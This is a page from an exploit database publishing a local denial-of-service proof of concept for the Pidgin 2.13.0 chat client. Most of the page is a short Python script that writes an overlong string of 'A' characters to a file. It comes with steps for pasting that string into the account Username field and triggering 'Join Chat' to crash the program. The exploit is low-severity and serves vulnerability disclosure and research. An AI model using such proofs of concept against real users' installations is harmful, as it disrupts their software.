Pidgin 2.13.0 Denial of Service

2019.06.03
Credit: Alejandra Sánchez
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# -*- coding: utf-8 -*- # Exploit Title: Pidgin 2.13.0 - Denial of Service (PoC) # Date: 24/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://pidgin.im/ # Software https://cfhcable.dl.sourceforge.net/project/pidgin/Pidgin/2.13.0/pidgin-2.13.0.exe # Version: 2.13.0 # Tested on: Windows 7, Windows 10 # Proof of Concept: # 1.- Run the python script 'pidgin.py', it will create a new file 'pidgin.txt' # 2.- Open Pidgin # 3.- Go to 'Accounts' > 'Manage Accounts' # 4.- Click 'Add...', paste the content of pidgin.txt into the field 'Username', # into the field 'Password' write anything, e.g. 1234 and click 'Add' # 5.- On the taskbar, click show hidden icons, right click on Pingin and select 'Join Chat...' # 6.- Now click 'Join' and crashed buffer = "\x41" * 1000 f = open ("pidgin.txt", "w") f.write(buffer) f.close()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top